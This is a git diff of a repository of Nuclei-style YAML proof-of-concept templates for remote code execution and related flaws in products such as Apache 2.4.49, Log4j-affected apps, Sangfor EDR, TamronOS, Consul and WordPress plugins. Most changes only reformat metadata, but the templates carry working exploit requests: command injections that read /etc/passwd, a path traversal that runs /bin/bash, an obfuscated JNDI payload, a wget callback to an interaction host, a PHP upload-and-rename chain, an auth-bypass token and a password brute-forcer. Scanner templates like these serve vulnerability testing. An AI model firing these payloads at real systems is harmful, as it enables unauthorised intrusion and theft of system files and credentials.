-# Enhanced by mp on 2022/05/25
diff --git a/poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml b/poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml
old mode 100755
new mode 100644
diff --git a/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml b/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml
index 38e6e72150..cc0303645c 100644
--- a/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml
+++ b/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml
@@ -1,19 +1,21 @@
id: hashicorp-consul-rce
info:
- name: Hashicorp Consul Services Api RCE
+ name: Hashicorp Consul Services API - Remote Code Execution
author: pikpikcu
severity: critical
- reference: https://www.exploit-db.com/exploits/46074
- tags: hashicorp,rce,oob
+ description: Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to gaino remote command execution on Consul nodes.
+ reference:
+ - https://www.exploit-db.com/exploits/46074
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: hashicorp,rce,oast,intrusive
requests:
- raw:
- | # Create USER
PUT /v1/agent/service/register HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Length: 205
{
"ID": "{{randstr}}",
@@ -31,3 +33,5 @@ requests:
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
+
+# Enhanced by mp on 2022/06/01
diff --git a/poc/remote_code_execution/hashicorp-consul-rce.yaml b/poc/remote_code_execution/hashicorp-consul-rce.yaml
index 0c4b432be5..d69e9f5708 100644
--- a/poc/remote_code_execution/hashicorp-consul-rce.yaml
+++ b/poc/remote_code_execution/hashicorp-consul-rce.yaml
@@ -1,16 +1,21 @@
id: hashicorp-consul-rce
+
info:
name: Hashicorp Consul Services Api RCE
author: pikpikcu
severity: critical
- reference:
- - https://www.exploit-db.com/exploits/46074
- tags: hashicorp,rce,oast,intrusive
+ reference: https://www.exploit-db.com/exploits/46074
+ tags: hashicorp,rce,oob
+
requests:
- raw:
- | # Create USER
PUT /v1/agent/service/register HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Length: 205
{
"ID": "{{randstr}}",
@@ -23,6 +28,7 @@ requests:
"Timeout": "86400s"
}
}
+
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
diff --git a/poc/remote_code_execution/hiboss-rce-7945.yaml b/poc/remote_code_execution/hiboss-rce-7945.yaml
index 827e35bc3b..8e6c523e36 100644
--- a/poc/remote_code_execution/hiboss-rce-7945.yaml
+++ b/poc/remote_code_execution/hiboss-rce-7945.yaml
@@ -1,15 +1,11 @@
id: hiboss-rce
info:
- name: Hiboss - Remote Code Execution
+ name: Hiboss RCE
author: pikpikcu
severity: critical
- description: HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
+ description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
reference:
- http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
tags: hiboss,rce
requests:
- raw:
@@ -28,5 +24,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/06/03
diff --git a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml
index caa8758541..a7494e8328 100644
--- a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml
+++ b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml
@@ -1,12 +1,11 @@
id: icewarp-webclient-rce
-
info:
name: IceWarp WebClient RCE
author: gy741
severity: critical
+ reference:
+ - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
tags: icewarp,rce
- reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
-
requests:
- raw:
- |
@@ -15,14 +14,12 @@ requests:
Content-Type: application/x-www-form-urlencoded
_dlg[captcha][target]=system(\'ver\')\
-
matchers-condition: and
matchers:
- type: word
words:
- "Microsoft Windows [Version"
part: body
-
- type: status
status:
- 302
diff --git a/poc/remote_code_execution/metersphere-plugin-rce.yaml b/poc/remote_code_execution/metersphere-plugin-rce.yaml
index 78b6fd5836..6a7a2bac58 100644
--- a/poc/remote_code_execution/metersphere-plugin-rce.yaml
+++ b/poc/remote_code_execution/metersphere-plugin-rce.yaml
@@ -3,10 +3,10 @@ info:
name: MeterSphere Plugin Pre-auth RCE
author: pdteam,y4er
severity: critical
- tags: metersphere,rce,intrusive
reference:
- https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
- https://github.com/metersphere/metersphere
+ tags: metersphere,rce,intrusive
requests:
- raw:
- |
diff --git a/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml b/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml
index d6fe1d8eb4..b66890728d 100644
--- a/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml
+++ b/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml
@@ -1,4 +1,5 @@
id: mobileiron-log4j-jndi-rce
+
info:
name: MobileIron Log4J JNDI RCE
author: meme-lord
@@ -10,6 +11,7 @@ info:
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
- https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron
tags: rce,jndi,oast,log4j,mobileiron
+
requests:
- raw:
- |
@@ -18,19 +20,22 @@ requests:
Content-Type: application/x-www-form-urlencoded
j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
+
matchers-condition: and
matchers:
- type: word
- part: interactsh_protocol # Confirms the DNS Interaction
+ part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
+
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
\ No newline at end of file
diff --git a/poc/remote_code_execution/natshell-rce.yaml b/poc/remote_code_execution/natshell-rce.yaml
index a9cb6aa19c..2b7a5614d1 100644
--- a/poc/remote_code_execution/natshell-rce.yaml
+++ b/poc/remote_code_execution/natshell-rce.yaml
@@ -1,26 +1,22 @@
id: natshell-rce
-
info:
name: NatShell Debug File RCE
author: pikpikcu
severity: critical
- reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
+ reference:
+ - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
tags: natshell,rce
-
requests:
- method: POST
path:
- "{{BaseURL}}/debug.php"
body: |
cmd=cat /etc/passwd
-
matchers-condition: and
matchers:
-
- type: regex
regex:
- "toor:[x*]:0:0"
-
- type: status
status:
- 200
diff --git a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml
index cc1d3a4837..2d962b0a96 100644
--- a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml
+++ b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml
@@ -1,11 +1,8 @@
id: pdf-signer-ssti-to-rce
-
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
- description: todo
-
requests:
- method: GET
path:
diff --git a/poc/remote_code_execution/phalcon-framework-source.yaml b/poc/remote_code_execution/phalcon-framework-source.yaml
index 0e2270201c..179a41795e 100644
--- a/poc/remote_code_execution/phalcon-framework-source.yaml
+++ b/poc/remote_code_execution/phalcon-framework-source.yaml
@@ -1,9 +1,8 @@
id: phalcon-framework-source
info:
- name: Phalcon Framework - Source Code Leakage
+ name: Phalcon Framework Source Code leakage
author: philippedelteil
severity: high
- description: Phalcon Framework source code was discovered.
tags: exposure,debug,phalcon
requests:
- method: GET
@@ -20,5 +19,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/07/15
diff --git a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml
index 9ddbab9b4c..aae82c8c57 100644
--- a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml
+++ b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml
@@ -1,35 +1,33 @@
id: qi-anxin-netkang-next-generation-firewall-rce
+
info:
- name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution
+ name: Qi'anxin Netkang Next Generation Firewall RCE
author: pikpikcu
severity: critical
- description: |
- Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution.
- reference:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
- tags: rce,firewall,intrusive
+ reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ tags: rce
+
requests:
- raw:
- |
POST /directdata/direct/router HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ Content-Length: 178
- {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
+ {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
- |
- GET /{{randstr}}.txt HTTP/1.1
+ GET /poc.txt HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+
matchers-condition: and
matchers:
- type: regex
- part: body
regex:
- - "root:.*:0:0:"
+ - "root:.*:0:0"
+ part: body
+
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/05/30
diff --git a/poc/remote_code_execution/rce-cve-2021-41773.yaml b/poc/remote_code_execution/rce-cve-2021-41773.yaml
index 87e89bc5e2..f8fd2f8e57 100644
--- a/poc/remote_code_execution/rce-cve-2021-41773.yaml
+++ b/poc/remote_code_execution/rce-cve-2021-41773.yaml
@@ -1,51 +1,16 @@
id: CVE-2021-41773
-
info:
- name: Apache 2.4.49 - Path Traversal and Remote Code Execution
- author: daffainfo
- severity: high
- description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
- reference:
- - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- - https://twitter.com/ptswarm/status/1445376079548624899
- - https://twitter.com/h4x0r_dz/status/1445401960371429381
- - https://github.com/blasty/CVE-2021-41773
- remediation: Update to Apache HTTP Server 2.4.50 or later.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2021-41773
- cwe-id: CWE-22
- metadata:
- shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
- tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa
-
+ name: RCE in Apache HTTP Server 2.4.49
+ author: RafaelCaria
+ severity: critical
+ tags: cve,cve2021,rce
requests:
- - raw:
- - |
- GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
- Host: {{Hostname}}
-
- - |
- POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
-
- matchers-condition: or
+ - method: POST
+ path:
+ - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+ body: 'echo;id'
matchers:
-
- type: regex
- name: LFI
+ part: body
regex:
- - "root:.*:0:0:"
-
- - type: word
- name: RCE
- words:
- - "CVE-2021-41773-POC"
-
-# Enhanced by mp on 2022/02/27
+ - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b"
diff --git a/poc/remote_code_execution/rconfig-rce.yaml b/poc/remote_code_execution/rconfig-rce.yaml
index 207517a711..3ebb60b6c5 100644
--- a/poc/remote_code_execution/rconfig-rce.yaml
+++ b/poc/remote_code_execution/rconfig-rce.yaml
@@ -1,22 +1,14 @@
id: rconfig-rce
-
info:
- name: rConfig 3.9.5 - Arbitrary File Upload
+ name: rConfig 3.9.5 - Remote Code Execution
author: dwisiswant0
severity: high
- description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cwe-id: CWE-434
+ tags: rconfig,rce
+ description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878
- tags: rconfig,rce,edb
- metadata:
- max-request: 1
-
-http:
+requests:
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
@@ -54,16 +46,12 @@ http:
9
--01b28e152ee044338224bf647275f8eb--
-
matchers-condition: and
matchers:
- type: word
words:
- "User {{randstr}} successfully added to Database"
-
part: body
- type: status
status:
- 302
-
-# Enhanced by md on 2022/10/05
diff --git a/poc/remote_code_execution/salesforce-aura-9981.yaml b/poc/remote_code_execution/salesforce-aura-9981.yaml
index 1fd9a804b6..b6c85071b2 100644
--- a/poc/remote_code_execution/salesforce-aura-9981.yaml
+++ b/poc/remote_code_execution/salesforce-aura-9981.yaml
@@ -4,7 +4,7 @@ info:
author: aaron_costello (@ConspiracyProof)
severity: info
reference: https://www.enumerated.de/index/salesforce
- tags: aura,unauth,salesforce,exposure
+ tags: aura,unauth,salesforce
requests:
- method: POST
path:
@@ -14,6 +14,6 @@ requests:
body: "{}"
matchers:
- type: word
- part: body
words:
- 'aura:invalidSession'
+ part: body
diff --git a/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml b/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml
index eeec0fe91a..fdd06e0395 100644
--- a/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml
+++ b/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml
@@ -1,10 +1,15 @@
id: samsung-wlan-ap-rce
info:
- name: Samsung Wlan AP (WEA453e) RCE
+ name: Samsung WLAN AP WEA453e - Remote Code Execution
author: pikpikcu
severity: critical
+ description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.
reference:
- - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+ - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
tags: xss,samsung,rce
requests:
- method: POST
@@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/poc/remote_code_execution/sangfor-edr-rce-10030.yaml b/poc/remote_code_execution/sangfor-edr-rce-10030.yaml
index c51500b87d..1952c84b15 100644
--- a/poc/remote_code_execution/sangfor-edr-rce-10030.yaml
+++ b/poc/remote_code_execution/sangfor-edr-rce-10030.yaml
@@ -1,5 +1,4 @@
id: sangfor-edr-rce
-
info:
name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution
author: pikpikcu
@@ -12,11 +11,9 @@ info:
cvss-score: 10.0
cwe-id: CWE-77
metadata:
- max-request: 1
fofa-query: app="sangfor"
tags: rce,sangfor
-
-http:
+requests:
- method: POST
path:
- "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9"
@@ -24,14 +21,12 @@ http:
Content-Type: application/x-www-form-urlencoded
body: |
{"params":"w=123\"'1234123'\"|cat /etc/passwd"}
-
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
-
- type: status
status:
- 200
diff --git a/poc/remote_code_execution/sar2html-rce-10082.yaml b/poc/remote_code_execution/sar2html-rce-10082.yaml
index 24a127592a..c32fd046bb 100644
--- a/poc/remote_code_execution/sar2html-rce-10082.yaml
+++ b/poc/remote_code_execution/sar2html-rce-10082.yaml
@@ -1,5 +1,4 @@
id: sar2html-rce
-
info:
name: sar2html 3.2.1 - 'plot' Remote Code Execution
author: gy741
@@ -7,14 +6,12 @@ info:
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
reference: https://www.exploit-db.com/exploits/49344
tags: sar2html,rce,oast
-
requests:
- raw:
- |
GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
-
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
diff --git a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml
index 574d070ebd..2cfcddd5ab 100644
--- a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml
+++ b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml
@@ -1,12 +1,11 @@
id: showdoc-file-upload-rce
-
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
severity: critical
- reference: https://github.com/star7th/showdoc/pull/1059
+ reference:
+ - https://github.com/star7th/showdoc/pull/1059
tags: rce,fileupload,showdoc
-
requests:
- raw:
- |
@@ -20,7 +19,6 @@ requests:
----------------------------835846770881083140190633--
-
matchers-condition: and
matchers:
- type: word
@@ -28,12 +26,10 @@ requests:
- '"url":"http:'
- '"success":1'
condition: and
-
- type: status
status:
- 200
-
extractors:
- type: json
json:
- - '.url'
\ No newline at end of file
+ - '.url'
diff --git a/poc/remote_code_execution/springboot-log4j-rce.yaml b/poc/remote_code_execution/springboot-log4j-rce.yaml
index 28f847f7e4..4286931f8d 100644
--- a/poc/remote_code_execution/springboot-log4j-rce.yaml
+++ b/poc/remote_code_execution/springboot-log4j-rce.yaml
@@ -1,10 +1,9 @@
id: springboot-log4j-rce
info:
- name: Spring Boot - Remote Code Execution (Apache Log4j)
+ name: Spring Boot Log4j Remote Code Injection
author: pdteam
severity: critical
- description: Spring Boot is susceptible to remote code execution via Apache Log4j.
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://www.lunasec.io/docs/blog/log4j-zero-day/
@@ -45,6 +44,4 @@ requests:
part: interactsh_request
group: 1
regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
-
-# Enhanced by mp on 2022/05/31
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
\ No newline at end of file
diff --git a/poc/remote_code_execution/tamronos-rce.yaml b/poc/remote_code_execution/tamronos-rce.yaml
index 9a9e405787..03c27beac8 100644
--- a/poc/remote_code_execution/tamronos-rce.yaml
+++ b/poc/remote_code_execution/tamronos-rce.yaml
@@ -1,19 +1,24 @@
id: tamronos-rce
+
info:
name: TamronOS IPTV/VOD RCE
author: pikpikcu
severity: critical
reference: https://twitter.com/sec715/status/1405336456923471874
tags: tamronos,rce
+
requests:
- method: GET
path:
- "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"
+
matchers-condition: and
matchers:
+
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:.*:0:0"
+
- type: status
status:
- 200
diff --git a/poc/remote_code_execution/thinkcmf-rce-10727.yaml b/poc/remote_code_execution/thinkcmf-rce-10727.yaml
index 715539039f..0173c895e9 100644
--- a/poc/remote_code_execution/thinkcmf-rce-10727.yaml
+++ b/poc/remote_code_execution/thinkcmf-rce-10727.yaml
@@ -6,18 +6,19 @@ info:
reference: https://www.freebuf.com/vuls/217586.html
tags: thinkcmf,rce
requests:
- - raw:
- - |
- GET /index.php?a=fetch&content={{url_encode('/Isc/third-party/httpd/htdocs/test.txt;"
- "{{BaseURL}}/test.txt"
-
matchers-condition: and
matchers:
- type: status
diff --git a/poc/remote_code_execution/webui-rce.yaml b/poc/remote_code_execution/webui-rce.yaml
index 09b1d2e004..372b5a39ce 100644
--- a/poc/remote_code_execution/webui-rce.yaml
+++ b/poc/remote_code_execution/webui-rce.yaml
@@ -1,21 +1,32 @@
id: webui-rce
+
info:
- name: WebUI 1.5b6 RCE
+ name: WebUI 1.5b6 - Remote Code Execution
author: pikpikcu
severity: critical
- description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
- reference: https://www.exploit-db.com/exploits/36821
+ description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/36821
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
tags: webui,rce
+
requests:
- method: GET
path:
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
+
matchers-condition: and
matchers:
- type: word
words:
- "c5b3d7397a90f42d222f7ed9408c0dc6"
part: body
+
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml b/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml
index b4c420c7dc..e4393fb210 100644
--- a/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml
+++ b/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml
@@ -1,29 +1,46 @@
id: wp-woocommerce-email-verification
+
info:
- name: wordpress-emails-verification-for-woocommerce
- author: random-robbie
+ name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
+ author: random_robbie,daffianfo
severity: critical
- tags: wordpress,wp-plugin
-
- # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
- # https://wpvulndb.com/vulnerabilities/10318
- # GDPR plugin may give a false positive so double check headers
+ description: |
+ Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
+ reference:
+ - https://wpvulndb.com/vulnerabilities/10318
+ - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cwe-id: CWE-288
+ metadata:
+ max-request: 2
+ tags: woocommerce,wp,wpscan,wordpress,wp-plugin
-requests:
+http:
- method: GET
path:
+ - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
- - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
+
+ stop-at-first-match: true
matchers-condition: and
matchers:
+ - type: regex
+ part: header
+ regex:
+ - "wordpress_logged_in_[a-z0-9]{32}"
+
- type: word
+ part: body
words:
- - "wordpress_logged_in"
- part: header
+ - "Your account has been activated!"
+ - "From your account dashboard you can view your"
+ condition: and
- type: status
status:
- - 401
- - 403
- negative: true
\ No newline at end of file
+ - 200
+
+# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950
diff --git a/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml b/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml
index 804afc6b74..d50fb50d35 100644
--- a/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml
+++ b/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml
@@ -1,4 +1,5 @@
id: wordpress-rce-simplefilelist
+
info:
name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
author: princechaddha
@@ -6,15 +7,14 @@ info:
reference: https://wpscan.com/vulnerability/10192
description: |
The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
- tags: wordpress,wp-plugin,rce
+ tags: wordpress,wp-plugin,rce,intrusive,upload,python
+
requests:
- raw:
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
- Connection: close
- Content-Length: 693
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
@@ -39,22 +39,21 @@ requests:
--6985fa39c0698d07f6d418b37388e1b2--
+
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
- User-Agent: python-requests/2.25.1
- Accept: */*
- Connection: close
X-Requested-With: XMLHttpRequest
- Content-Length: 81
+ Accept: */*
Content-Type: application/x-www-form-urlencoded
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
+
- |
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
- Connection: close
+
matchers-condition: and
matchers:
- type: word
diff --git a/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml b/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml
index cb27f780b4..26b60896bf 100644
--- a/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml
+++ b/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml
@@ -1,5 +1,4 @@
id: wordpress-xmlrpc-brute-force
-
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
@@ -9,7 +8,6 @@ info:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
tags: wordpress,php,xmlrpc,fuzz
-
requests:
- raw:
- |
@@ -29,18 +27,15 @@ requests:
-
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
-
matchers-condition: and
matchers:
- type: status
status:
- 200
-
- type: word
part: body
words:
diff --git a/poc/remote_code_execution/yapi-rce-11726.yaml b/poc/remote_code_execution/yapi-rce-11726.yaml
index 0078f2b883..0afebedde5 100644
--- a/poc/remote_code_execution/yapi-rce-11726.yaml
+++ b/poc/remote_code_execution/yapi-rce-11726.yaml
@@ -1,17 +1,19 @@
id: yapi-rce
-
info:
- name: Yapi Remote Code Execution
+ name: Yapi - Remote Code Execution
author: pikpikcu
severity: critical
